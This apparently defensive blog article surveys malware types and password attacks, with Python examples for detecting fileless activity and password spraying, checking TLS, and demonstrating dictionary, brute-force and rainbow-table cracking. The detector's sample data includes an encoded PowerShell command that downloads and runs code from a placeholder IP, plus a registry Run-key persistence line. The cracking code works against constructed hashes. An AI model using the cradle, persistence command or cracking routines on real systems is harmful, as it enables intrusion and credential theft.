Know Thy Enemy – Most Common Types of Malware & Password Attacks
In the previous posts here, we talked about the Main Types of Cyber Threats and Common Types of Cyber Threats with Examples. In this article, we look at the most common types of malware and password attacks. Malware and web-based attacks are among the most damaging and expensive attacks, with companies spending an average of US $2.4 million on defence. More worrying, recent data indicates that 7 out of every 10 malware payloads were ransomware. With ransomware attacks rising sharply in 2020, this is bound to cause problems for organizations in the future. macOS malware and mobile malware are on the rise too: the former grew by about 165%, and 98% of mobile malware targets Android devices.
Despite the rising risk, password hygiene and effective password management have yet to show any significant improvement. 90% of internet users are worried about getting their password stolen or hacked. 53% continue to rely on memory alone to manage passwords. Most significantly, 57% of people who have already been scammed in phishing attacks still haven't changed their passwords. If you are worried about password security in your organization, consider implementing a zero trust architecture for remote work security.
What is a cyber threat level?
The Cyber Threat Level Indicator helps you assess the current level of malicious cyber activity and estimates the potential/actual damage. The Cyber Threat Level Indicator has five levels of risk.
Cyber Threat Level Indicator
The two extremes of the Cyber Threat Level Indicator are red and green. Red indicates a severe risk of malicious activity with widespread negative impact, such as system outages, permanent system compromise, or a crippling effect on critical infrastructure sectors. Green indicates a low risk: no unusual activity that might point to a threat has been detected. Cloud Security Solutions offers an effective Cyber Threat Level Indicator to help you accurately assess risks.
What is Malware?
Malware is a general term for software designed to infiltrate programmable devices, services or networks and damage systems and data. It is commonly used to extract data that criminals can sell or leverage for their own ends, including financial gain. All data has value, but personally identifiable information, financial data, healthcare records and credentials are the most frequently targeted.
Types of Malware and Spyware Attacks
Trojans appear and behave like legitimate files or applications and dupe users into downloading and executing them. Once running, they are used to damage the network or steal valuable organizational data.
Adware is a type of malware that continuously shows unwanted advertisements to unsuspecting users. It is more of a nuisance than a direct threat, typically producing highly distracting advertisements and pop-ups whenever the user tries to do anything on the system. Users often install adware unwittingly when they try to obtain programs or services without paying for them.
Ransomware is currently the most common form of attack. It encrypts files on a device, or otherwise renders them inaccessible, and the files can only be recovered with a decryption key the attacker holds. Criminals demand a significant ransom in exchange for the key and, increasingly, for not releasing or selling data they stole before encrypting it.
Malicious advertising, or malvertising, involves embedding malicious code in legitimate advertisements. This kind of attack can take place without any action by the user beyond loading the page. Cybercriminals typically purchase legitimate advertising space on legitimate websites and insert malicious code within the ad.
Backdoor Attacks
Just as the name suggests, a backdoor gives the attacker a way into an organization's network that bypasses the normal authentication required to access the system. It lets cyber criminals remotely reach valuable resources such as databases and file servers, issue system commands, and update the malware already in place.
Exploit Kit Attacks
These malicious toolkits probe a target's computer or mobile device, typically through the browser and its plugins, for known vulnerabilities. When the kit finds one, it exploits it to deliver malware to the system. Exploit kits are the reason security experts insist on applying software patches as soon as they are released.
Drive-by Download Attacks
A drive-by download is a delivery technique rather than a type of malware: it requires no user interaction beyond visiting a page. The download happens automatically when a user visits a malicious or compromised website hosting an exploit kit. The kit quickly fingerprints the browser for vulnerabilities and injects malware through one of them.
Fileless Malware Attacks
Fileless malware uses legitimate programs already present on the system to carry out the infection, typically living in memory and in the registry rather than on disk. Such attacks are harder to protect against because there is no malware file on disk to scan and the malicious activity runs inside trusted, signed processes, so the usual file-based antivirus checks have nothing to match. This makes fileless malware very hard to detect and remove.
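Because there is no file to scan, fileless activity is caught in process telemetry rather than on disk. The following is an added example, not code from the original post: it runs a few detection rules over constructed process-creation records (the parent, image and command-line fields an EDR or Sysmon event 1 would provide) and flags the patterns that typically accompany living-off-the-land attacks. The use of PowerShell encoded commands, download cradles and a Run-key persistence write is a common form of such attacks that the text above does not name specifically; the records, hostnames and field names are all constructed for this example.

```python
import base64
import re


def encoded_command(script):
    """PowerShell's -EncodedCommand argument is base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry (assumed field layout; not real data).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/x')"
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {encoded_command(CRADLE)}"},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmdline": 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
                '/v upd /t REG_SZ /d "powershell -w hidden -enc ..."'},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|FromBase64String|-w(?:indowstyle)?\s+hidden",
    re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RUN_KEY = re.compile(r"reg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """List the reasons a process-creation event looks like fileless activity."""
    reasons = []
    cmd = ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = cmd + " " + decoded          # inspect the decoded script as well
    if SUSPICIOUS.search(cmd):
        reasons.append("download cradle / hidden window")
    if ev["image"].lower() == "powershell.exe" and ev["parent"].lower() in OFFICE_PARENTS:
        reasons.append("spawned by Office")
    if RUN_KEY.search(cmd):
        reasons.append("registry Run key persistence")
    return reasons


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["image"], "<-", ev["parent"], score_event(ev) or "clean")
```

The first and last records are ordinary administrative and system activity and produce no findings; the Office-spawned PowerShell with an encoded download cradle and the Run-key write are exactly the behaviour a file scanner never sees. In production, decode the command line before matching, since the interesting strings are usually hidden inside the base64.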
Worms spread copies of themselves from system to system without any user interaction, and do not need to be embedded in another program in order to execute.
The Verizon 2019 Data Breach Investigations Report found that 29% of all breaches involved the use of stolen credentials. Recent data suggests that 63% of internal data breaches in organizations result from compromised usernames and passwords. 65% of companies still have over 500 users who have never been asked to change their passwords, and 69% of small businesses do not strictly enforce password policies. Data from 2020 indicated that 500,000 stolen Zoom passwords were available for sale in dark web crime forums. The ubiquity of password and phishing attacks has pushed companies towards passwordless logins using biometrics or other factors for access. Listed below are some of the most common forms of password attacks prevalent today.
Types of Password Attacks
Brute-force Password Guessing Attacks
This kind of attack involves numerous automated attempts to guess the password and gain access. Trying every letter-and-number combination takes time, so attackers narrow the search: they try common or short passwords first, or apply provider-specific rules (such as the minimum accepted length) to prune the candidate list.
A dictionary attack uses commonly used words and phrases and frequently chosen passwords. Attackers often narrow the scope further with common names of pets, movie characters and people, then try variants with numbers and special characters appended or substituted to force their way to the correct password.
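The difference between the two approaches is one of cost. The following is an added example, not code from the original post, that shows the trade-off concretely: a small wordlist with mangling rules (case changes, leet substitution, appended digits and symbols) recovers a "pet name plus year" password in a few dozen guesses, while exhaustive brute force only ever finishes on a tiny keyspace such as a 4-digit PIN. The wordlist, suffix list and target passwords are constructed for this example, and unsalted SHA-256 stands in for whatever hash is under attack.

```python
import hashlib
import itertools


def sha256_hex(text):
    """Unsalted SHA-256 of a candidate; stands in for the hash under attack."""
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed sample wordlist and mangling rules (assumptions for this example).
WORDS = ["password", "fluffy", "batman", "summer"]
SUFFIXES = ["", "1", "123", "2019", "2020", "!", "1!"]
LEET = str.maketrans("aeios", "43105")


def mangle(word):
    """Yield dictionary candidates derived from one base word."""
    bases = {word, word.capitalize(), word.upper(), word.translate(LEET)}
    for base in sorted(bases):
        for suffix in SUFFIXES:
            yield base + suffix


def dictionary_candidates(words):
    """Candidates for a dictionary attack, in wordlist order, without repeats."""
    seen = set()
    for word in words:
        for candidate in mangle(word):
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def brute_force_candidates(alphabet, max_len):
    """Every string over `alphabet` up to `max_len` characters, shortest first."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            yield "".join(chars)


def keyspace(alphabet_size, max_len):
    """Number of candidates an exhaustive search must consider."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


def crack(target_hash, candidates, limit=10_000_000):
    """Try candidates in order until one hashes to target_hash.

    Returns (password or None, number of guesses made)."""
    attempts = 0
    for candidate in candidates:
        if attempts >= limit:
            break
        attempts += 1
        if sha256_hex(candidate) == target_hash:
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    found, n = crack(sha256_hex("Fluffy2019"), dictionary_candidates(WORDS))
    print(f"dictionary: {found!r} after {n} guesses")
    found, n = crack(sha256_hex("4821"), brute_force_candidates("0123456789", 4))
    print(f"brute force: {found!r} after {n} of {keyspace(10, 4)} guesses")
    print(f"keyspace for 10 mixed-case alphanumerics: {keyspace(62, 10):.3e}")
```

The generator style matters: a real cracker never materialises the candidate list, and the same `crack` loop works whether the candidates come from a dictionary, a rule engine or a brute-force enumerator. Length and unpredictability, not character-class rules, are what push a password out of reach of both.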
Keylogger attacks make use of spyware that logs the user's keystrokes. This kind of attack is commonly used to steal anything from passwords to credit card numbers. Keyloggers do not just record the username and password; they also note the website where the credentials were entered. They can be deployed as hardware or software. Software keyloggers are more common, because users can easily be manipulated into clicking a link that installs the spyware, and keyloggers can also be bundled with software downloaded from the Internet.
Credential Stuffing Attacks
Credential stuffing exploits an unfortunately popular user habit: reusing the same password for multiple accounts across websites. It also capitalizes on the astounding number of credentials already compromised in past breaches. Keep in mind that a single breach at a major provider (business or service) can expose millions of username and password pairs. Credential stuffing replays those stolen pairs against other websites to see which of them still work, and the automation behind it makes the attack incredibly effective.
Traffic Interception Attacks
Traffic interception, a variation on the man-in-the-middle attack, involves the threat actor eavesdropping on network traffic to monitor and capture data. A common way of doing that is through unsecured Wi-Fi connections or connections that do not use encryption, such as plain HTTP. Even TLS (SSL) traffic is not automatically safe. In what is called SSL hijacking, the attacker interposes a proxy between the user and the intended website, terminating the connection on each side, and reads any information passing between the two, such as passwords. This only works if the client accepts the attacker's certificate instead of the genuine one, or if the attacker can downgrade the user to plain HTTP (SSL stripping); a client that verifies certificates and refuses the downgrade defeats the bridge.
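The client-side checks that make the attacker's bridge fail are small. The following is an added example, not code from the original post, written against Python's standard library: it shows the verifying TLS client configuration beside the unverified one that lets an interposed certificate through, a redirect resolver that refuses the https-to-http downgrade an SSL-stripping proxy relies on, and a parser for the Strict-Transport-Security header a browser uses to remember that a host must only be reached over HTTPS. The URLs and header values are constructed for this example.

```python
import ssl
from urllib.parse import urljoin, urlsplit


def client_context(verify=True):
    """TLS client settings.

    The default context verifies the certificate chain and the hostname,
    which is what makes an attacker's substituted certificate fail.
    verify=False reproduces the common mistake that lets it succeed."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def safe_redirect_target(current_url, location):
    """Resolve a Location header; refuse an https -> http downgrade.

    Returns the absolute URL to follow, or None if following it would drop
    the connection to plain HTTP."""
    target = urljoin(current_url, location)
    if urlsplit(current_url).scheme == "https" and urlsplit(target).scheme != "https":
        return None
    return target


def parse_hsts(header):
    """Parse a Strict-Transport-Security header into its directives.

    Returns None if there is no max-age, which makes the header invalid."""
    max_age = None
    include_subdomains = False
    preload = False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age" and value.strip('"').isdigit():
            max_age = int(value.strip('"'))
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return {"max_age": max_age, "include_subdomains": include_subdomains,
            "preload": preload}


if __name__ == "__main__":
    print("verifying:", client_context().verify_mode == ssl.CERT_REQUIRED)
    print("downgrade:", safe_redirect_target("https://bank.example/login",
                                             "http://bank.example/login"))
    print("hsts:", parse_hsts("max-age=31536000; includeSubDomains; preload"))
```

A remembered HSTS entry is what stops the stripping attack on the very first request of a later session: the client upgrades to HTTPS before the proxy sees a plain-HTTP request to rewrite.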
Password Spraying Attacks
Password spraying takes a hit-or-miss approach: a small set of very common passwords is tried against a large number of user accounts, one or two guesses per account. It is especially popular against single sign-on and cloud-based accounts. The attacker has to be careful, because repeated failures against one account would trigger a lockout; spraying stays under that threshold by spreading the attempts across many users and organizations and pacing them over time, so per-account lockout alone does not stop it.
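Credential stuffing and password spraying are both designed to stay under per-account lockout thresholds, so the defender has to look across accounts rather than at one. The following is an added example, not code from the original post, that makes that point with detection logic run over a constructed set of authentication events: a classic per-account lockout rule catches the noisy brute force against one user but is blind to the source that fails once against many users, while a per-source rule flags it. The log format, addresses and usernames are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample of authentication events (assumed format; not real logs).
SAMPLE_LOG = """\
2024-05-01T09:00:01Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:00:02Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:00:03Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:00:04Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:00:05Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:00:06Z src=198.51.100.5 user=bob result=FAIL
2024-05-01T09:10:00Z src=203.0.113.7 user=alice result=FAIL
2024-05-01T09:10:04Z src=203.0.113.7 user=carol result=FAIL
2024-05-01T09:10:09Z src=203.0.113.7 user=dave result=FAIL
2024-05-01T09:10:13Z src=203.0.113.7 user=erin result=FAIL
2024-05-01T09:10:18Z src=203.0.113.7 user=frank result=FAIL
2024-05-01T09:10:22Z src=203.0.113.7 user=grace result=SUCCESS
2024-05-01T09:10:27Z src=203.0.113.7 user=heidi result=FAIL
2024-05-01T09:30:00Z src=192.0.2.10 user=alice result=SUCCESS
2024-05-01T09:31:00Z src=192.0.2.11 user=carol result=FAIL
2024-05-01T09:31:30Z src=192.0.2.11 user=carol result=SUCCESS
"""

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse(text):
    """Turn the raw log into a list of event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def locked_accounts(events, threshold=5):
    """Classic per-account lockout: accounts with at least `threshold` failures."""
    fails = defaultdict(int)
    for e in events:
        if e["result"] == "FAIL":
            fails[e["user"]] += 1
    return {user for user, count in fails.items() if count >= threshold}


def spray_sources(events, min_users=5, max_per_user=2):
    """Per-source rule: a source that fails against many distinct accounts while
    staying under the lockout threshold on each one is spraying or stuffing.

    Returns {source: sorted list of targeted users}."""
    per_src = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["result"] == "FAIL":
            per_src[e["src"]][e["user"]] += 1
    flagged = {}
    for src, users in per_src.items():
        if len(users) >= min_users and max(users.values()) <= max_per_user:
            flagged[src] = sorted(users)
    return flagged


def successes_from(events, sources):
    """Successful logins from flagged sources: the accounts to reset first."""
    return sorted((e["user"], e["src"]) for e in events
                  if e["src"] in sources and e["result"] == "SUCCESS")


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print("locked by per-account rule:", locked_accounts(events))
    sprayers = spray_sources(events)
    print("spraying sources:", sprayers)
    print("compromised via spray:", successes_from(events, sprayers))
```

Note that the spraying source never appears in the lockout set, because no single account it touched reached five failures. A production detector would additionally bucket events by time window, since a patient attacker spreads the same pattern over hours or days, and would key on more than the source address when the attempts come from a proxy pool.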
Rainbow Table Attacks
Most websites do not store passwords directly: the password is hashed, a one-way transformation (not encryption) that turns it into a fixed-length string of characters, and only the hash is kept in the database. Every time the user logs on, the entered password is hashed again and compared with the stored value. A rainbow table attack is similar to a dictionary attack but uses a precomputed table: for a given hash function and password space, the attacker has already computed chains of hashes in advance, so a stolen hash can be looked up and the original password recovered without guessing at attack time. Rainbow tables for common hashing algorithms are widely available, or can be generated with tools such as RainbowCrack and Ophcrack. They only work against unsalted hashes: if each stored password is hashed together with a unique random salt, a table would have to be built per salt, which removes the benefit of precomputation.
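To make the time/memory trade-off concrete, the following is an added example, not code from the original post, of a toy rainbow table. It assumes a deliberately tiny password space (4-digit PINs), unsalted MD5 as the hash, 20-link chains and 600 fixed start points; none of these parameters come from the article. Only the chain ends are stored, the intermediate links are recomputed on lookup, and a per-user salt is shown to make the table useless. The reduction function, start-point spread and `salted_hash` helper are this example's own constructions.

```python
import hashlib

# Toy parameters (assumptions for this example): PIN space, chain length, chains.
SPACE = 10_000
CHAIN_LEN = 20
NUM_CHAINS = 600


def H(pin):
    """The unsalted hash the table is built for (MD5 here, by assumption)."""
    return hashlib.md5(pin.encode()).hexdigest()


def reduce_to_pin(digest, step):
    """Map a hash back into the PIN space.

    The step index makes every link use a different reduction function, which
    is what distinguishes a rainbow table from a plain hash chain and limits
    the damage when two chains collide and merge."""
    return f"{(int(digest[:8], 16) + step) % SPACE:04d}"


def build_table():
    """Precompute chains; store only (end PIN -> start PIN)."""
    table = {}
    for i in range(NUM_CHAINS):
        start = f"{(i * 17) % SPACE:04d}"   # deterministic spread of start points
        pin = start
        for step in range(CHAIN_LEN):
            pin = reduce_to_pin(H(pin), step)
        table.setdefault(pin, start)         # on a merge, keep the first chain
    return table


def lookup(table, target):
    """Recover the PIN whose hash is `target`, or None if no chain covers it."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target sits at link `pos` and walk the rest of the chain.
        pin = reduce_to_pin(target, pos)
        for step in range(pos + 1, CHAIN_LEN):
            pin = reduce_to_pin(H(pin), step)
        start = table.get(pin)
        if start is None:
            continue
        # Regenerate the chain from its start and confirm the hash is really
        # there; a matching end can be a false alarm from a merged chain.
        pin = start
        for step in range(CHAIN_LEN):
            if H(pin) == target:
                return pin
            pin = reduce_to_pin(H(pin), step)
    return None


def coverage(table):
    """Fraction of the PIN space recoverable from the stored chains."""
    seen = set()
    for start in table.values():
        pin = start
        for step in range(CHAIN_LEN):
            seen.add(pin)
            pin = reduce_to_pin(H(pin), step)
    return len(seen) / SPACE


def salted_hash(pin, salt):
    """Per-user salt: the table was built for H(pin), not H(salt + pin)."""
    return hashlib.md5((salt + pin).encode()).hexdigest()


if __name__ == "__main__":
    table = build_table()
    print(f"stored {len(table)} chain ends covering {coverage(table):.0%} of PINs")
    print("H('0000')      ->", lookup(table, H("0000")))
    print("salted '0000'  ->", lookup(table, salted_hash("0000", "s4lt")))
```

The table stores a few hundred endpoints instead of ten thousand hashes, and pays for that with the chain walks at lookup time; that is the whole trade-off. Merged chains and the uncovered remainder are why real tables use far more chains than the space size divided by the chain length. The salted lookup fails not because MD5 got stronger but because the precomputation was done for the wrong function, which is the property a per-user salt, combined with a slow password hash such as bcrypt or Argon2, is meant to provide.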